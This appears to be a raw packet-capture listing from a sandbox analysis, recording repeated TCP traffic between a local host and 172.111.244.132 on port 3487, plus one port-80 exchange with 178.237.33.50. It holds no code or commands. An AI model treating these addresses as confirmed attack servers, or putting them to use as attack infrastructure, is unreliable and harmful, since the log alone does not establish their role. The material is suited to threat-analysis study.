                                                                                                                                                            Nov 5, 2024 10:03:29.998984098 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.998996973 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999013901 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999022961 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999032974 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999042988 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999058962 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999095917 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999118090 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999126911 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999136925 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999175072 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999193907 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999207973 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999229908 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999296904 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999305010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999322891 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999336004 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:29.999341011 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:29.999371052 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000063896 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000107050 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000190020 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000200033 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000211954 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000221968 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000231981 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000242949 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000257969 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000264883 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000283003 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000293970 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000300884 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000313997 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000322104 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000329971 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000341892 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000350952 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000359058 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.000366926 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.000394106 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.003799915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.003809929 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.003820896 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.003840923 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.003870964 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.004332066 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.004342079 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.004352093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.004403114 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.005346060 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.005354881 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.005399942 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.006356001 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006375074 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006382942 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006397963 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.006428957 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.006468058 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006511927 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006525040 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006550074 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.006717920 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006757021 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.006772041 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006844997 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006853104 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.006891966 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.007005930 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007046938 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.007054090 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007064104 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007101059 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.007122993 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007132053 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007178068 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.007461071 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007477999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007529020 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.007589102 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007597923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.007648945 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009169102 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009232044 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009241104 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009274006 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009294987 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009305000 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009336948 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009350061 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009371996 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009381056 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009386063 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009433985 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009455919 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009465933 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009515047 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.009896040 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009905100 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.009958029 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.010107994 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010117054 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010166883 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.010483980 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010504007 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010549068 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.010708094 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010720015 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010730982 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010766029 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.010777950 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010787010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010797977 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010808945 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.010813951 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.010853052 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011478901 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011519909 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011550903 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011560917 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011573076 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011584044 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011593103 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011600018 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011612892 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011619091 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011631966 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011640072 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011650085 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011656046 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011667013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011673927 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011681080 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011691093 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011698008 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011706114 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011714935 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011723042 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011729956 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011739969 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011754990 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011765957 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011795044 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011893034 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011931896 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.011950970 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011960030 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011971951 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011981010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.011991978 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012013912 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012021065 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012031078 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012039900 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012051105 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012063026 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012068987 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012079954 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012085915 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012130976 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012505054 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012516022 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012526035 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012553930 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012567997 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012578964 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012587070 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012598038 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012609005 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012626886 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012634039 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012643099 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012651920 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012661934 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012670040 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012680054 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012689114 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012716055 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012723923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012732029 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012739897 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012753010 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012758970 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012773991 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012784004 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012792110 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012799978 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012814999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012821913 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012846947 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012867928 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012901068 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012908936 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012917995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.012943983 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.012959957 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013021946 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013031006 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013071060 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013125896 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013135910 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013144970 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013168097 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013227940 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013237000 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013247013 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013267994 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013295889 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013303041 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013310909 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013348103 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013386011 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013406038 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013413906 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013452053 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013521910 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013531923 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013541937 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013561010 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013571978 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013582945 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013588905 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013601065 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013618946 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013634920 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013644934 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013654947 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013665915 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013674974 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013683081 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013689041 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013708115 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013778925 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013834000 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013869047 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.013930082 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013941050 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013951063 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.013974905 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014003038 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014013052 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014022112 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014048100 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014075041 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014444113 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014455080 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014463902 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014472008 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014481068 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014497995 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014508009 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014518023 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014530897 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014537096 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014554977 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014560938 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014569998 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014576912 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014589071 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014605999 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014611959 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014617920 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014624119 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014635086 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014655113 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014661074 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014667034 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014676094 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014684916 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014686108 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014693022 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014702082 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014714003 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014718056 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.014739990 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.014755011 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:30.215161085 CET8049901178.237.33.50192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:30.216257095 CET4990180192.168.2.4178.237.33.50
                                                                                                                                                            Nov 5, 2024 10:03:31.813471079 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:31.818555117 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818566084 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818573952 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818582058 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818634033 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:31.818651915 CET499003487192.168.2.4172.111.244.132
                                                                                                                                                            Nov 5, 2024 10:03:31.818676949 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818686008 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818701982 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818711042 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818718910 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.818953037 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.823734045 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.823743105 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.823885918 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.824017048 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.824033022 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.824052095 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.824070930 CET348749900172.111.244.132192.168.2.4
                                                                                                                                                            Nov 5, 2024 10:03:31.831147909 CET499003487192.168.2.4172.111.244.132
